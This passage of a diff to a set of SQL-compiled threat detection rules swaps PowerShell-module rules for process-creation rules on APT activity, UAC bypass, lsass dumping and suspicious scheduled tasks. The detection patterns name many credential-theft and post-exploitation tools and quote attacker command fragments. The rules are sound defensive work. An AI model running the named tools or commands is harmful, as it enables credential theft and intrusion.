Yugoslavskiy, oscd.community", "tags": [ 
- "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR 
Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo 
minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": 
"posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% 
/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR 
CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, 
oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP 
'(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' 
OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP 
'\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' 